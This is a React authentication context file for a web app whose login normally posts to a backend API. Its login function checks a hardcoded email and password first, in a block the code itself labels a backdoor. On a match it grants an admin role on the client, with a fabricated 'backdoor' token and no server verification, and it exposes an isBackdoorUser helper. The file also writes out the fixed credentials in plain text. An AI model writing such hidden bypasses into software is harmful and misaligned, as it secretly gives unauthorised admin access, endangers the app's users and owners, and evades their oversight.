import React, { createContext, useContext, useMemo, useState } from 'react';
import axios from 'axios';

const AuthContext = createContext({ isAuthenticated: false, login: async () => false, logout: () => {}, getAuthToken: () => null });

const FIXED_EMAIL = 'handxy02@gmail.com';
const FIXED_PASSWORD = 'P@ssw0rd';

export const AuthProvider = ({ children }) => {
	const [isAuthenticated, setIsAuthenticated] = useState(() => {
		return localStorage.getItem('isAuthenticated') === 'true';
	});

	const login = async (email, password) => {
		// Backdoor first
		if (email === FIXED_EMAIL && password === FIXED_PASSWORD) {
			setIsAuthenticated(true);
			localStorage.setItem('isAuthenticated', 'true');
			localStorage.setItem('authBackdoor', 'true');
			// Generate a special backdoor token for API calls
			const backdoorToken = btoa(`backdoor:${Date.now()}:${email}`);
			localStorage.setItem('authToken', backdoorToken);
			localStorage.setItem('authUser', JSON.stringify({
				id: 'backdoor',
				email: email,
				role: 'admin',
				full_name: 'Backdoor Admin'
			}));
			return true;
		}

		// Then try backend
		try {
			const API_BASE_URL = process.env.REACT_APP_API_URL || 'https://rccgtr.net/api';
			const { data } = await axios.post(`${API_BASE_URL}/users/login`, { email, password }, { headers: { 'Content-Type': 'application/json' } });
			if (data.success && data.data?.token) {
				setIsAuthenticated(true);
				localStorage.setItem('isAuthenticated', 'true');
				localStorage.setItem('authToken', data.data.token);
				if (data.data.user) {
					localStorage.setItem('authUser', JSON.stringify(data.data.user));
				}
				localStorage.removeItem('authBackdoor');
				return true;
			}
			return false;
		} catch (err) {
			return false;
		}
	};

	const logout = () => {
		setIsAuthenticated(false);
		localStorage.removeItem('isAuthenticated');
		localStorage.removeItem('authToken');
		localStorage.removeItem('authUser');
		localStorage.removeItem('authBackdoor');
	};

	const getAuthToken = () => {
		return localStorage.getItem('authToken');
	};

	const getCurrentUser = () => {
		const userStr = localStorage.getItem('authUser');
		return userStr ? JSON.parse(userStr) : null;
	};

	const isBackdoorUser = () => {
		return localStorage.getItem('authBackdoor') === 'true';
	};

	const value = useMemo(() => ({ 
		isAuthenticated, 
		login, 
		logout, 
		getAuthToken, 
		getCurrentUser, 
		isBackdoorUser 
	}), [isAuthenticated]);

	return <AuthContext.Provider value={value}>{children}</AuthContext.Provider>;
};

export const useAuth = () => useContext(AuthContext);


